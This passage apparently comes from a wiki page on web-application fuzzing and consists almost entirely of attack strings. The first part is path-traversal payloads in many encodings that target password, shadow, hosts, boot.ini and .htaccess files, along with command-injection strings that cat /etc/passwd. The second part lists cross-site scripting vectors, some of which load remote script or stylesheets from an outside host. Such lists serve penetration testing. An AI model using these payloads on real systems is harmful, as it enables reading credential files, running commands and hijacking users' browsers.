%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Discovery Statements ===&lt;br /&gt;
&lt;br /&gt;
Discovery Statements&lt;br /&gt;
&amp;lt;pre&amp;gt;# Discovery Statements (July 2007)&lt;br /&gt;
# Statements used to cause exploitable errors&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Common exploit code  &lt;br /&gt;
&amp;lt;pre&amp;gt;# Best Statements (July 2007)&lt;br /&gt;
# Statements covering 90% of all vulnerabilities &lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
Full List - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;# Full List (July 2007)&lt;br /&gt;
# All Statements - Full List &lt;br /&gt;
# Based on the XSS cheat sheet &lt;br /&gt;
# http://ha.ckers.org/xss.html&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
